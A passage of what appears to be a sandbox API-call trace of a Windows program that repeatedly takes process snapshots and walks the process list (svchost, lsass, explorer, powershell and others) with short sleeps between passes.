Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0263.170] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0263.171] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0263.173] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0263.176] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.178] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0263.180] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0263.182] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0263.314] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0263.316] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0263.318] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0263.320] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0263.322] CloseHandle (hObject=0x2338) returned 1 [0263.322] Sleep (dwMilliseconds=0x64) [0263.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0263.340] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.341] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.343] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.345] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.346] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.348] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.349] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.351] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.390] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.392] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.393] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.395] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.397] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.398] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.400] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.401] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.403] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.404] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.405] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.407] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.408] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0263.410] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.411] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0263.413] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.527] Sleep (dwMilliseconds=0x64) [0263.556] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0263.567] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.720] Sleep (dwMilliseconds=0x64) [0263.757] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0263.768] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.929] Sleep (dwMilliseconds=0x64) [0263.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0264.014] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.119] Sleep (dwMilliseconds=0x64) [0264.202] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0264.214] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.420] Sleep (dwMilliseconds=0x64) [0264.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0264.468] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.625] Sleep (dwMilliseconds=0x64) [0264.664] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0264.717] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.823] Sleep (dwMilliseconds=0x64) [0264.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0264.886] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.035] Sleep (dwMilliseconds=0x64) [0265.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0265.081] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0265.373] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0265.663] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.812] Sleep (dwMilliseconds=0x64) [0265.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0265.923] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.077] Sleep (dwMilliseconds=0x64) [0266.113] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0266.124] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.311] Sleep (dwMilliseconds=0x64) [0266.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0266.368] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.545] Sleep (dwMilliseconds=0x64) [0266.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0266.657] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.857] Sleep (dwMilliseconds=0x64) [0266.899] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2160 [0266.913] Process32First (in: hSnapshot=0x2160, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.056] Sleep (dwMilliseconds=0x64) [0267.096] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0267.107] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.271] Sleep (dwMilliseconds=0x64) [0267.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0267.362] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.565] Sleep (dwMilliseconds=0x64) [0267.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0267.635] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.787] Sleep (dwMilliseconds=0x64) [0267.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0267.845] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.040] Sleep (dwMilliseconds=0x64) [0268.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0268.126] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.212] Sleep (dwMilliseconds=0x64) [0268.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0268.304] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.461] Sleep (dwMilliseconds=0x64) [0268.514] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0268.526] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.699] Sleep (dwMilliseconds=0x64) [0268.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0268.786] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.925] Sleep (dwMilliseconds=0x64) [0268.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0268.973] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.111] Sleep (dwMilliseconds=0x64) [0269.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0269.306] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.475] Sleep (dwMilliseconds=0x64) [0269.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0269.561] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.716] Sleep (dwMilliseconds=0x64) [0269.756] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0269.767] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.936] Sleep (dwMilliseconds=0x64) [0269.975] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0269.986] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.144] Sleep (dwMilliseconds=0x64) [0270.183] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0270.233] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.407] Sleep (dwMilliseconds=0x64) [0270.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0270.465] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.617] Sleep (dwMilliseconds=0x64) [0270.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0270.722] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.877] Sleep (dwMilliseconds=0x64) [0270.915] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0270.926] Process32First (in: hSnapshot=0x2320, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.109] Sleep (dwMilliseconds=0x64) [0271.150] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21dc [0271.161] Process32First (in: hSnapshot=0x21dc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.335] Sleep (dwMilliseconds=0x64) [0271.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21dc [0271.383] Process32First (in: hSnapshot=0x21dc, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 